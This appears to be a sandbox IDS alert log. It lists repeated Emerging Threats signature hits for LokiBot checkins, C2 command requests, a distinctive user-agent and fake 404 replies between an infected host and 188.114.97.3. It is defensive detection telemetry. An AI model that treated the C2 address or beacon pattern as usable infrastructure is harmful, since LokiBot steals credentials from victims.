              2024-09-25T10:19:38.140430+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749735188.114.97.380TCP
              2024-09-25T10:19:38.140430+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749735188.114.97.380TCP
              2024-09-25T10:19:38.145206+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749735TCP
              2024-09-25T10:19:39.239881+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749736188.114.97.380TCP
              2024-09-25T10:19:39.239881+02002025381ET MALWARE LokiBot Checkin1192.168.2.749736188.114.97.380TCP
              2024-09-25T10:19:39.239881+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749736188.114.97.380TCP
              2024-09-25T10:19:39.901885+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749736188.114.97.380TCP
              2024-09-25T10:19:39.901885+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749736188.114.97.380TCP
              2024-09-25T10:19:39.906710+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749736TCP
              2024-09-25T10:19:40.078687+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749737188.114.97.380TCP
              2024-09-25T10:19:40.078687+02002025381ET MALWARE LokiBot Checkin1192.168.2.749737188.114.97.380TCP
              2024-09-25T10:19:40.078687+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749737188.114.97.380TCP
              2024-09-25T10:19:40.752516+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749737188.114.97.380TCP
              2024-09-25T10:19:40.752516+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749737188.114.97.380TCP
              2024-09-25T10:19:40.757426+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749737TCP
              2024-09-25T10:19:40.911451+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749738188.114.97.380TCP
              2024-09-25T10:19:40.911451+02002025381ET MALWARE LokiBot Checkin1192.168.2.749738188.114.97.380TCP
              2024-09-25T10:19:40.911451+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749738188.114.97.380TCP
              2024-09-25T10:19:41.580058+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749738188.114.97.380TCP
              2024-09-25T10:19:41.580058+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749738188.114.97.380TCP
              2024-09-25T10:19:41.586005+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749738TCP
              2024-09-25T10:19:41.735560+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749739188.114.97.380TCP
              2024-09-25T10:19:41.735560+02002025381ET MALWARE LokiBot Checkin1192.168.2.749739188.114.97.380TCP
              2024-09-25T10:19:41.735560+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749739188.114.97.380TCP
              2024-09-25T10:19:42.413942+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749739188.114.97.380TCP
              2024-09-25T10:19:42.413942+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749739188.114.97.380TCP
              2024-09-25T10:19:42.418949+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749739TCP
              2024-09-25T10:19:42.570720+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749740188.114.97.380TCP
              2024-09-25T10:19:42.570720+02002025381ET MALWARE LokiBot Checkin1192.168.2.749740188.114.97.380TCP
              2024-09-25T10:19:42.570720+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749740188.114.97.380TCP
              2024-09-25T10:19:43.241128+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749740188.114.97.380TCP
              2024-09-25T10:19:43.241128+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749740188.114.97.380TCP
              2024-09-25T10:19:43.246416+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749740TCP
              2024-09-25T10:19:43.399885+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749741188.114.97.380TCP
              2024-09-25T10:19:43.399885+02002025381ET MALWARE LokiBot Checkin1192.168.2.749741188.114.97.380TCP
              2024-09-25T10:19:43.399885+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749741188.114.97.380TCP
              2024-09-25T10:19:44.027788+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749741188.114.97.380TCP
              2024-09-25T10:19:44.027788+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749741188.114.97.380TCP
              2024-09-25T10:19:44.032597+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749741TCP
              2024-09-25T10:19:44.190956+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749742188.114.97.380TCP
              2024-09-25T10:19:44.190956+02002025381ET MALWARE LokiBot Checkin1192.168.2.749742188.114.97.380TCP
              2024-09-25T10:19:44.190956+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749742188.114.97.380TCP
              2024-09-25T10:19:44.852239+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749742188.114.97.380TCP
              2024-09-25T10:19:44.852239+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749742188.114.97.380TCP
              2024-09-25T10:19:44.857234+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749742TCP
              2024-09-25T10:19:45.016789+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749743188.114.97.380TCP
              2024-09-25T10:19:45.016789+02002025381ET MALWARE LokiBot Checkin1192.168.2.749743188.114.97.380TCP
              2024-09-25T10:19:45.016789+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749743188.114.97.380TCP
              2024-09-25T10:19:45.666427+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749743188.114.97.380TCP
              2024-09-25T10:19:45.666427+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749743188.114.97.380TCP
              2024-09-25T10:19:45.671293+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749743TCP
              2024-09-25T10:19:45.828745+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749744188.114.97.380TCP
              2024-09-25T10:19:45.828745+02002025381ET MALWARE LokiBot Checkin1192.168.2.749744188.114.97.380TCP
              2024-09-25T10:19:45.828745+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749744188.114.97.380TCP
              2024-09-25T10:19:46.545472+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749744188.114.97.380TCP
              2024-09-25T10:19:46.545472+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749744188.114.97.380TCP
              2024-09-25T10:19:46.551465+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749744TCP
              2024-09-25T10:19:46.711712+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749745188.114.97.380TCP
              2024-09-25T10:19:46.711712+02002025381ET MALWARE LokiBot Checkin1192.168.2.749745188.114.97.380TCP
              2024-09-25T10:19:46.711712+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749745188.114.97.380TCP
              2024-09-25T10:19:47.442427+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749745188.114.97.380TCP
              2024-09-25T10:19:47.442427+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749745188.114.97.380TCP
              2024-09-25T10:19:47.447756+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749745TCP
              2024-09-25T10:19:47.595407+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749746188.114.97.380TCP
              2024-09-25T10:19:47.595407+02002025381ET MALWARE LokiBot Checkin1192.168.2.749746188.114.97.380TCP
              2024-09-25T10:19:47.595407+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749746188.114.97.380TCP
              2024-09-25T10:19:48.277146+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749746188.114.97.380TCP
              2024-09-25T10:19:48.277146+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749746188.114.97.380TCP
              2024-09-25T10:19:48.282001+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749746TCP
              2024-09-25T10:19:48.437321+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749747188.114.97.380TCP
              2024-09-25T10:19:48.437321+02002025381ET MALWARE LokiBot Checkin1192.168.2.749747188.114.97.380TCP
              2024-09-25T10:19:48.437321+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749747188.114.97.380TCP
              2024-09-25T10:19:49.076736+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749747188.114.97.380TCP
              2024-09-25T10:19:49.076736+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749747188.114.97.380TCP
              2024-09-25T10:19:49.081572+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749747TCP
              2024-09-25T10:19:49.234722+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749748188.114.97.380TCP
              2024-09-25T10:19:49.234722+02002025381ET MALWARE LokiBot Checkin1192.168.2.749748188.114.97.380TCP
              2024-09-25T10:19:49.234722+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749748188.114.97.380TCP
              2024-09-25T10:19:49.885438+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749748188.114.97.380TCP
              2024-09-25T10:19:49.885438+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749748188.114.97.380TCP
              2024-09-25T10:19:49.890230+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749748TCP
              2024-09-25T10:19:50.049266+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749749188.114.97.380TCP
              2024-09-25T10:19:50.049266+02002025381ET MALWARE LokiBot Checkin1192.168.2.749749188.114.97.380TCP
              2024-09-25T10:19:50.049266+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749749188.114.97.380TCP
              2024-09-25T10:19:50.708565+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749749188.114.97.380TCP
              2024-09-25T10:19:50.708565+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749749188.114.97.380TCP
              2024-09-25T10:19:50.713445+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749749TCP
              2024-09-25T10:19:50.858143+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749750188.114.97.380TCP
              2024-09-25T10:19:50.858143+02002025381ET MALWARE LokiBot Checkin1192.168.2.749750188.114.97.380TCP
              2024-09-25T10:19:50.858143+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749750188.114.97.380TCP
              2024-09-25T10:19:51.507840+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749750188.114.97.380TCP
              2024-09-25T10:19:51.507840+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749750188.114.97.380TCP
              2024-09-25T10:19:51.512658+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749750TCP
              2024-09-25T10:19:51.659793+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749751188.114.97.380TCP
              2024-09-25T10:19:51.659793+02002025381ET MALWARE LokiBot Checkin1192.168.2.749751188.114.97.380TCP
              2024-09-25T10:19:51.659793+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749751188.114.97.380TCP
              2024-09-25T10:19:52.350336+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749751188.114.97.380TCP
              2024-09-25T10:19:52.350336+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749751188.114.97.380TCP
              2024-09-25T10:19:52.356086+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749751TCP
              2024-09-25T10:19:52.634585+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749752188.114.97.380TCP
              2024-09-25T10:19:52.634585+02002025381ET MALWARE LokiBot Checkin1192.168.2.749752188.114.97.380TCP
              2024-09-25T10:19:52.634585+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749752188.114.97.380TCP
              2024-09-25T10:19:53.355659+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749752188.114.97.380TCP
              2024-09-25T10:19:53.355659+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749752188.114.97.380TCP
              2024-09-25T10:19:53.360531+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749752TCP
              2024-09-25T10:19:53.523329+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749753188.114.97.380TCP
              2024-09-25T10:19:53.523329+02002025381ET MALWARE LokiBot Checkin1192.168.2.749753188.114.97.380TCP
              2024-09-25T10:19:53.523329+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749753188.114.97.380TCP
              2024-09-25T10:19:54.186780+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749753188.114.97.380TCP
              2024-09-25T10:19:54.186780+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749753188.114.97.380TCP
              2024-09-25T10:19:54.191774+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749753TCP
              2024-09-25T10:19:54.536452+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749754188.114.97.380TCP
              2024-09-25T10:19:54.536452+02002025381ET MALWARE LokiBot Checkin1192.168.2.749754188.114.97.380TCP
              2024-09-25T10:19:54.536452+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749754188.114.97.380TCP
              2024-09-25T10:19:55.325978+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749754188.114.97.380TCP
              2024-09-25T10:19:55.325978+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749754188.114.97.380TCP
              2024-09-25T10:19:55.331030+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749754TCP
              2024-09-25T10:19:55.485678+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749755188.114.97.380TCP
              2024-09-25T10:19:55.485678+02002025381ET MALWARE LokiBot Checkin1192.168.2.749755188.114.97.380TCP
              2024-09-25T10:19:55.485678+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749755188.114.97.380TCP
              2024-09-25T10:19:56.126948+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749755188.114.97.380TCP
              2024-09-25T10:19:56.126948+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749755188.114.97.380TCP
              2024-09-25T10:19:56.131913+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749755TCP
              2024-09-25T10:19:56.301649+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749756188.114.97.380TCP
              2024-09-25T10:19:56.301649+02002025381ET MALWARE LokiBot Checkin1192.168.2.749756188.114.97.380TCP
              2024-09-25T10:19:56.301649+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749756188.114.97.380TCP
              2024-09-25T10:19:57.009360+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749756188.114.97.380TCP
              2024-09-25T10:19:57.009360+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749756188.114.97.380TCP
              2024-09-25T10:19:57.014226+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749756TCP
              2024-09-25T10:19:57.172763+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749757188.114.97.380TCP
              2024-09-25T10:19:57.172763+02002025381ET MALWARE LokiBot Checkin1192.168.2.749757188.114.97.380TCP
              2024-09-25T10:19:57.172763+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749757188.114.97.380TCP
              2024-09-25T10:19:58.849605+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749757188.114.97.380TCP
              2024-09-25T10:19:58.849605+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749757188.114.97.380TCP
              2024-09-25T10:19:58.854920+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749757TCP
              2024-09-25T10:19:59.000979+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749758188.114.97.380TCP
              2024-09-25T10:19:59.000979+02002025381ET MALWARE LokiBot Checkin1192.168.2.749758188.114.97.380TCP
              2024-09-25T10:19:59.000979+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749758188.114.97.380TCP
              2024-09-25T10:19:59.726091+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749758188.114.97.380TCP
              2024-09-25T10:19:59.726091+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749758188.114.97.380TCP
              2024-09-25T10:19:59.736725+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749758TCP
              2024-09-25T10:19:59.891904+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749759188.114.97.380TCP
              2024-09-25T10:19:59.891904+02002025381ET MALWARE LokiBot Checkin1192.168.2.749759188.114.97.380TCP
              2024-09-25T10:19:59.891904+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749759188.114.97.380TCP
              2024-09-25T10:20:00.560306+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749759188.114.97.380TCP
              2024-09-25T10:20:00.560306+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749759188.114.97.380TCP
              2024-09-25T10:20:00.565087+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749759TCP
              2024-09-25T10:20:00.718978+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749760188.114.97.380TCP
              2024-09-25T10:20:00.718978+02002025381ET MALWARE LokiBot Checkin1192.168.2.749760188.114.97.380TCP
              2024-09-25T10:20:00.718978+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749760188.114.97.380TCP
              2024-09-25T10:20:01.361671+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749760188.114.97.380TCP
              2024-09-25T10:20:01.361671+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749760188.114.97.380TCP
              2024-09-25T10:20:01.366740+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749760TCP
              2024-09-25T10:20:01.526168+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749761188.114.97.380TCP
              2024-09-25T10:20:01.526168+02002025381ET MALWARE LokiBot Checkin1192.168.2.749761188.114.97.380TCP
              2024-09-25T10:20:01.526168+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749761188.114.97.380TCP
              2024-09-25T10:20:02.229063+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749761188.114.97.380TCP
              2024-09-25T10:20:02.229063+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749761188.114.97.380TCP
              2024-09-25T10:20:02.233938+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749761TCP
              2024-09-25T10:20:02.392071+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749763188.114.97.380TCP
              2024-09-25T10:20:02.392071+02002025381ET MALWARE LokiBot Checkin1192.168.2.749763188.114.97.380TCP
              2024-09-25T10:20:02.392071+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749763188.114.97.380TCP
              2024-09-25T10:20:03.088731+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749763188.114.97.380TCP
              2024-09-25T10:20:03.088731+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749763188.114.97.380TCP
              2024-09-25T10:20:03.093667+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749763TCP
              2024-09-25T10:20:03.257255+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749764188.114.97.380TCP
              2024-09-25T10:20:03.257255+02002025381ET MALWARE LokiBot Checkin1192.168.2.749764188.114.97.380TCP
              2024-09-25T10:20:03.257255+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749764188.114.97.380TCP
              2024-09-25T10:20:03.904946+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749764188.114.97.380TCP
              2024-09-25T10:20:03.904946+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749764188.114.97.380TCP
              2024-09-25T10:20:03.909832+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749764TCP
              2024-09-25T10:20:04.071220+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749765188.114.97.380TCP
              2024-09-25T10:20:04.071220+02002025381ET MALWARE LokiBot Checkin1192.168.2.749765188.114.97.380TCP
              2024-09-25T10:20:04.071220+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749765188.114.97.380TCP
              2024-09-25T10:20:04.881977+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749765188.114.97.380TCP
              2024-09-25T10:20:04.881977+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749765188.114.97.380TCP
              2024-09-25T10:20:04.887903+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749765TCP
              2024-09-25T10:20:05.030104+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749766188.114.97.380TCP
              2024-09-25T10:20:05.030104+02002025381ET MALWARE LokiBot Checkin1192.168.2.749766188.114.97.380TCP
              2024-09-25T10:20:05.030104+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749766188.114.97.380TCP
              2024-09-25T10:20:05.709216+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749766188.114.97.380TCP
              2024-09-25T10:20:05.709216+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749766188.114.97.380TCP
              2024-09-25T10:20:05.714461+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749766TCP
              2024-09-25T10:20:05.858737+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749767188.114.97.380TCP
              2024-09-25T10:20:05.858737+02002025381ET MALWARE LokiBot Checkin1192.168.2.749767188.114.97.380TCP
              2024-09-25T10:20:05.858737+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749767188.114.97.380TCP
              2024-09-25T10:20:06.566813+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749767188.114.97.380TCP
              2024-09-25T10:20:06.566813+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749767188.114.97.380TCP
              2024-09-25T10:20:06.571760+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749767TCP
              2024-09-25T10:20:06.718238+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749768188.114.97.380TCP
              2024-09-25T10:20:06.718238+02002025381ET MALWARE LokiBot Checkin1192.168.2.749768188.114.97.380TCP
              2024-09-25T10:20:06.718238+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749768188.114.97.380TCP
              2024-09-25T10:20:07.429765+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749768188.114.97.380TCP
              2024-09-25T10:20:07.429765+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749768188.114.97.380TCP
              2024-09-25T10:20:07.434671+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749768TCP
              2024-09-25T10:20:07.582940+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749769188.114.97.380TCP
              2024-09-25T10:20:07.582940+02002025381ET MALWARE LokiBot Checkin1192.168.2.749769188.114.97.380TCP
              2024-09-25T10:20:07.582940+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749769188.114.97.380TCP
              2024-09-25T10:20:09.278627+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749769188.114.97.380TCP
              2024-09-25T10:20:09.278627+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749769188.114.97.380TCP
              2024-09-25T10:20:09.283551+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749769TCP
              2024-09-25T10:20:09.443638+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749770188.114.97.380TCP
              2024-09-25T10:20:09.443638+02002025381ET MALWARE LokiBot Checkin1192.168.2.749770188.114.97.380TCP
              2024-09-25T10:20:09.443638+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749770188.114.97.380TCP
              2024-09-25T10:20:10.191855+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749770188.114.97.380TCP
              2024-09-25T10:20:10.191855+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749770188.114.97.380TCP
              2024-09-25T10:20:10.196689+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749770TCP
              2024-09-25T10:20:10.343573+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749771188.114.97.380TCP
              2024-09-25T10:20:10.343573+02002025381ET MALWARE LokiBot Checkin1192.168.2.749771188.114.97.380TCP
              2024-09-25T10:20:10.343573+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749771188.114.97.380TCP
              2024-09-25T10:20:11.008415+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749771188.114.97.380TCP
              2024-09-25T10:20:11.008415+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749771188.114.97.380TCP
              2024-09-25T10:20:11.013287+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749771TCP
              2024-09-25T10:20:11.162336+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749772188.114.97.380TCP
              2024-09-25T10:20:11.162336+02002025381ET MALWARE LokiBot Checkin1192.168.2.749772188.114.97.380TCP
              2024-09-25T10:20:11.162336+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749772188.114.97.380TCP
              2024-09-25T10:20:11.812480+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749772188.114.97.380TCP
              2024-09-25T10:20:11.812480+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749772188.114.97.380TCP
              2024-09-25T10:20:11.817332+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749772TCP
              2024-09-25T10:20:11.972432+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749773188.114.97.380TCP
              2024-09-25T10:20:11.972432+02002025381ET MALWARE LokiBot Checkin1192.168.2.749773188.114.97.380TCP
              2024-09-25T10:20:11.972432+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749773188.114.97.380TCP
              2024-09-25T10:20:12.630621+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749773188.114.97.380TCP
              2024-09-25T10:20:12.630621+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749773188.114.97.380TCP
              2024-09-25T10:20:12.635415+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749773TCP
              2024-09-25T10:20:12.784342+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749774188.114.97.380TCP
              2024-09-25T10:20:12.784342+02002025381ET MALWARE LokiBot Checkin1192.168.2.749774188.114.97.380TCP
              2024-09-25T10:20:12.784342+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749774188.114.97.380TCP
              2024-09-25T10:20:13.435959+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749774188.114.97.380TCP
              2024-09-25T10:20:13.435959+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749774188.114.97.380TCP
              2024-09-25T10:20:13.440852+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749774TCP
              2024-09-25T10:20:13.600309+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749775188.114.97.380TCP
              2024-09-25T10:20:13.600309+02002025381ET MALWARE LokiBot Checkin1192.168.2.749775188.114.97.380TCP
              2024-09-25T10:20:13.600309+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749775188.114.97.380TCP
              2024-09-25T10:20:14.236381+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749775188.114.97.380TCP
              2024-09-25T10:20:14.236381+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749775188.114.97.380TCP
              2024-09-25T10:20:14.241223+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749775TCP
